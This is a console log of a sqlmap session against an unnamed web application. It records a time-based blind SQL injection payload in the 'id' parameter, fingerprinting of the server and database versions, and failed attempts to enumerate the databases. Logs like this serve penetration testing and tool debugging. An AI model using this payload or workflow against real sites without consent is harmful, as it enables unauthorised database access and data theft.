         _
 ___ ___| |_____ ___ ___  {1.0-dev-80b9fc4}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:57:30

[12:57:30] [DEBUG] cleaning up configuration parameters
[12:57:30] [INFO] setting file for logging HTTP traffic
[12:57:30] [DEBUG] setting the HTTP timeout
[12:57:30] [DEBUG] setting the HTTP method to GET
[12:57:30] [DEBUG] creating HTTP requests opener object
[12:57:30] [INFO] resuming back-end DBMS 'mysql' 
[12:57:30] [INFO] testing connection to the target URL
[12:57:30] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=70' AND SLEEP(5) AND 'rdzp'='rdzp&mus_id=2
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[12:57:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[12:57:30] [INFO] testing if current user is DBA
[12:57:30] [INFO] fetching current user
[12:57:30] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:57:30] [INFO] retrieved: [12:57:30] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[12:57:31] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 

[12:57:31] [DEBUG] performed 7 queries in 0.20 seconds
[12:57:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[12:57:31] [INFO] fetching database names
[12:57:31] [INFO] fetching number of databases
[12:57:31] [INFO] retrieved: 
[12:57:31] [DEBUG] performed 3 queries in 0.02 seconds
[12:57:31] [ERROR] unable to retrieve the number of databases
[12:57:31] [INFO] falling back to current database
[12:57:31] [INFO] fetching current database
[12:57:31] [INFO] retrieved: 
[12:57:31] [DEBUG] performed 7 queries in 0.04 seconds
[12:57:31] [CRITICAL] unable to retrieve the database names

[*] shutting down at 12:57:31

